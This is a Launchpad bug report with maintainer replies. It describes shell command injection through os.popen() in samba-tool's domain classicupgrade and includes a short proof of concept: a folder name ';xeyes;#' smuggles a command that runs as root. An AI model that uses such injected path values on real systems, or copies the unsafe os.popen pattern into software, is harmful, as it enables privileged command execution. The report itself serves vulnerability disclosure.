Shell command injection - samba-tool domain classicupgrade

Bug #1514046 reported by Bernd Dietzel on 2015-11-07
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
samba (Ubuntu)
Undecided
Unassigned

Bug Description

Attached screenshot

This python script allows the shell code injection :

/usr/lib/python2.7/dist-packages/samba/netcmd/domain.py

This function uses os.popen() wich injects the command in testparm, varname and the path to the smbconf :

def get_testparm_var(testparm, smbconf, varname):
    cmd = "%s -s -l --parameter-name='%s' %s 2>/dev/null" % (testparm, varname, smbconf)
    output = os.popen(cmd, 'r').readline()
    return output.strip()

--> So please use subprocess.Popen() , not os.popen()

Demo Exploit :
=============

1) Put a shell command in the folder name , e.g. ";xeyes;#"

/home/theregrunner/;xeyes;#/smb.conf

<theregrunner is my user name, you change this to your user name>

2) start samba tool like this :

sudo samba-tool domain classicupgrade '/home/theregrunner/;xeyes;#/smb.conf' --testparm /usr/bin/testparm

3) Now the xeyes program runs as root

ProblemType: Bug
DistroRelease: Ubuntu 15.10
Package: samba-common-bin 2:4.1.17+dfsg-4ubuntu2
ProcVersionSignature: Ubuntu 4.2.0-17.21-generic 4.2.3
Uname: Linux 4.2.0-17-generic x86_64
NonfreeKernelModules: wl
ApportVersion: 2.19.1-0ubuntu4
Architecture: amd64
CurrentDesktop: Unity
Date: Sat Nov 7 09:01:35 2015
InstallationDate: Installed on 2015-10-22 (15 days ago)
InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Release amd64 (20151021)
SambaServerRegression: No
SmbConfIncluded: No
SourcePackage: samba
UpgradeStatus: No upgrade log present (probably fresh install)
WindowsFailedConnect: Yes

Bernd Dietzel (l-ubuntuone1104) wrote :
Tyler Hicks (tyhicks) wrote :

Hi Bernd - Thanks for reporting this to us!

I don't feel like there's much of a chance that an attacker could control the path to the smb.conf file. This feels like a normal bug to me.

Have you reported this issue to upstream Samba? I think we'd prefer to wait for them to fix this upstream and for it to eventually make its way into Ubuntu rather than performing security updates to address this.

Changed in samba (Ubuntu):
status: New → Incomplete
Bernd Dietzel (l-ubuntuone1104) wrote :

If the path is on a webdav share or a usb device ...
The name of the /media/ is also part of the path so simply a usb stick name could inject a command.
I think this should not happen.

No, i haven't reported upstream.

Bernd Dietzel (l-ubuntuone1104) wrote :
information type: Private Security → Public Security
Seth Arnold (seth-arnold) wrote :

Thanks for finding and reporting this issue; I'm inclined to agree with upstream that this isn't crossing a security boundary, even though it is relatively unpleasant.

Thanks

Changed in samba (Ubuntu):
status: Incomplete → Won't Fix
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.